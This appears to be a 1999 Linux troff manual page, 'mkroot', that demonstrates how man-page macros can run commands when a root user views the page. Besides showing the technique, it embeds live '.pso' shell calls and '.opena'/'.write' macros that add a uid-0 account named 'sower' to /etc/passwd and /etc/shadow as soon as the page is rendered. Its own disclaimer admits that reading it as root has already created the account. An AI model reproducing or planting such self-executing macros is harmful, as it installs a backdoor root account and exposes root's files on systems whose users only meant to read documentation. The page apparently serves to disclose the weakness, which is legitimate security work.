.\" Copyright (c) 1999 Paweł Wilk .\" .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free Software Foundation; either version 2 of .\" the License, or (at your option) any later version. .\" .\" The GNU General Public License's references to "object code" .\" and "executables" are to be interpreted as the output of any .\" document formatting or typesetting system, including .\" intermediate and printed output. .\" .\" This manual is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public .\" License along with this manual; if not, write to the Free .\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, .\" USA. .\" .TH MKROOT 9 "07-22-1999" "manual page" "Linux Hacker's Manual" .SH NAME .! .psobyk mkroot \- make a root-shell .SH SYNOPSIS .BI "man mkroot" .SH DISCLAIMER This manual page contains some \fBtroff\fP macros which could break your system's security. If you are looking at this page being logged as root then you should know that right in this moment you have allready created new, privileged account called "sower". The account is disabled by default because of security reasons. Don't forget to remove it! ;-> This is for information only.... use it at your own risk. .SH DESCRIPTION Manual pages are usualy based on \fBtroff\fP (see .BR troff (1) ) macros. The point is, that some of these macros can access files or even invoke some shell commands. It's usable, but try to imaginate that the \fBtroff\fP macros contained in manual pages may have root privileges if the \fBtroff\fP command's caller is root. (!) .br .LP The most dangerous macros are: .TP .BI ".pso" " command" used to display output of some \fIcommand\fP .TP .BI ".write" " stream string" used to put the \fIstring\fP into the given \fIstream\fP .LP .SH EXAMPLES .BI "/root directory listing" " .pso ls -l /root" .nf .pso ls -l /root .fi .BI "creating new user called sower (passwd)" " " .nf .opena stream /etc/passwd .write stream sower:*:0:0::/:/dev/null .fi .opena stream /etc/passwd .write stream sower:!:0:0::/:/dev/null .BI "little preview" " .pso tail /etc/passwd" .nf .pso tail /etc/passwd .fi .BI "playing with shadow" "" .nf .opena stream /etc/shadow .write stream sower:*:10531:0:99999:7::10794: .fi .opena stream /etc/shadow .write stream sower:*:10531:0:99999:7::10794: .BI "fingering new user" " .pso finger sower" .nf .pso finger sower .fi .SH FILES .I /etc/passwd .I /etc/shadow .SH SEE ALSO .BR man (1), .BR passwd (1), .BR troff (1). .SH AUTHOR Pawel Wilk